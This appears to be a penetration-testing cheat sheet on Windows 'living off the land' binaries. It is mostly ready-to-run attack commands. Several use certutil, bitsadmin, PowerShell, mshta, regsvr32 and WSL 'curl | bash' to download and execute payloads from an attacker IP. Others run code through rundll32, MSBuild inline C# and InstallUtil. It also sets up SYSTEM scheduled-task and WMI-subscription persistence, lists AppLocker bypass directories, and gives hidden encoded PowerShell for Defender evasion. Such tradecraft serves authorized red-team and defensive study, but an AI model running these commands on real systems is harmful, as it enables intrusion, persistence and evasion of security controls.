LOLBAS

Sections LOLBAS

Living Off the Land Binaries And Scripts. Windows ships with signed Microsoft binaries that can download, execute, persist, and bypass restrictions. The full catalog is at lolbas-project.github.io .

Why care: signed by Microsoft = passes AV signature checks, often allowed by AppLocker / WDAC, blends into legitimate admin behavior.

i. Download a file

certutil, the classic:

certutil -urlcache -split -f http://10.10.14.1/sh.exe C:\Windows\Temp\sh.exe
## Sometimes flagged by Defender now, use -urlfetch for older boxes:
certutil -urlfetch http://10.10.14.1/sh.exe C:\Windows\Temp\sh.exe

bitsadmin:

bitsadmin /transfer job /download /priority high http://10.10.14.1/sh.exe C:\Windows\Temp\sh.exe

PowerShell (always available since Win7):

iwr http://10.10.14.1/sh.exe -OutFile C:\Windows\Temp\sh.exe
(New-Object Net.WebClient).DownloadFile('http://10.10.14.1/sh.exe','C:\Windows\Temp\sh.exe')

curl.exe (Win10 1803+):

curl http://10.10.14.1/sh.exe -o C:\Windows\Temp\sh.exe

MSHTA (downloads and runs HTA):

mshta http://10.10.14.1/sh.hta

regsvr32 (downloads and executes scriptlet):

regsvr32 /s /n /u /i:http://10.10.14.1/sh.sct scrobj.dll

xcopy / robocopy from SMB share:

xcopy \\10.10.14.1\share\sh.exe C:\Windows\Temp\ /Y

ii. Execute via signed binary

rundll32 with shellcode (no exe, no script extension):

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c calc")

regsvr32 (Squiblydoo):

regsvr32 /s /n /u /i:http://10.10.14.1/sh.sct scrobj.dll

mshta with inline VBScript/JScript:

mshta vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run ""cmd /c calc"", 0, True"))

InstallUtil (executes any .NET assembly’s Uninstall method):

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Temp\sh.exe

MSBuild (executes inline C# in an XML project file):

<!-- sh.csproj -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Hello"><ClassExample /></Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task><Code Type="Class" Language="cs">
      <![CDATA[
        using System; using System.Diagnostics; using Microsoft.Build.Utilities;
        public class ClassExample : Task, ITask {
          public override bool Execute() { Process.Start("cmd","/c calc"); return true; } }
      ]]>
    </Code></Task>
  </UsingTask>
</Project>

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe sh.csproj

This is the #1 AppLocker/WDAC bypass for years. MSBuild runs C# in-memory.

iii. WMI execution (local) 

wmic process call create "cmd.exe /c calc"

PowerShell:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd /c calc"

iv. Persistence via LOLBAS

Scheduled task that calls a LOLBin:

schtasks /create /tn updater /tr "regsvr32 /s /n /u /i:http://10.10.14.1/sh.sct scrobj.dll" /sc onlogon /ru SYSTEM

WMI event subscription:

$f = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name='X'; EventNameSpace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
$c = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='X'; CommandLineTemplate='cmd /c sh.exe'}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$f; Consumer=$c}

v. AppLocker / WDAC bypass

AppLocker default rules allow signed Microsoft binaries everywhere. AppLocker bypasses live in two categories:

Writable directories AppLocker allows by default:

  • C:\Windows\System32\spool\drivers\color\
  • C:\Windows\Tasks\
  • C:\Windows\Temp\ (sometimes)
  • C:\Windows\Tracing\
  • C:\Windows\System32\Tasks_Migrated\

Drop your unsigned binary here and AppLocker often allows execution.

Always-allowed signed LOLBins:

  • MSBuild.exe -> inline C# (see above)
  • InstallUtil.exe
  • regsvcs.exe / regasm.exe
  • mavinject.exe -> DLL injection
  • csi.exe (Roslyn C# REPL)
  • dnx.exe (older .NET)

WDAC (Windows Defender Application Control) is stricter. MSBuild and similar are often blocked in WDAC environments. Then you need:

  • Signed third-party binaries with known DLL hijacks
  • Trusted-installer-style techniques

vi. File transfer through signed channels

When network egress is restricted to MS endpoints only:

Office365 / Teams URLs (legitimate Microsoft):

  • Upload to a OneDrive or SharePoint you control, fetch via signed Edge/curl
  • Use Microsoft Graph API endpoints when you have a token

bits with custom server (less suspicious than raw HTTP):

bitsadmin /transfer mybits /priority high https://mscontent.example.com/payload.exe %temp%\payload.exe

vii. Common LOLBINS quick reference

BinaryUse case
certutil.exeDownload, base64 encode/decode
bitsadmin.exeDownload, persistence via job
regsvr32.exeExecute remote scriptlets (Squiblydoo)
rundll32.exeExecute DLL exports, JS via mshtml
mshta.exeHTA execution from URL
wmic.exeProcess create, remote execution
schtasks.exePersistence, scheduled tasks
sc.exeService creation, persistence
msiexec.exeInstall MSI, can run from URL
installutil.exeExecute .NET via Uninstall method
msbuild.exeInline C# execution, AppLocker bypass
forfiles.exeCommand execution wrapper
pcalua.exeProgram Compatibility Assistant, runs anything
diskshadow.exeScript engine that runs commands
ftp.exeFile transfer, also runs scripts via -s:

Full list: lolbas-project.github.io - searchable by function (Execute, Download, Copy, etc).

viii. Combining with Defender evasion

Almost every LOLBin is signatured now in payload contents, not in the binary itself. Hide the payload string by base64-encoding, splitting in pieces, or generating it at runtime:

powershell -nop -w hidden -enc <base64-of-iwr-and-iex>

See Defender & AMSI Evasion for AMSI bypass before any PowerShell-heavy execution.

ix. WSL as a LOLBIN

When the box has WSL installed, you get a full Linux environment that bypasses most Windows EDR:

wsl --list
wsl bash -c "curl http://10.10.14.1/sh.sh | bash"

Some EDRs monitor WSL, most do not.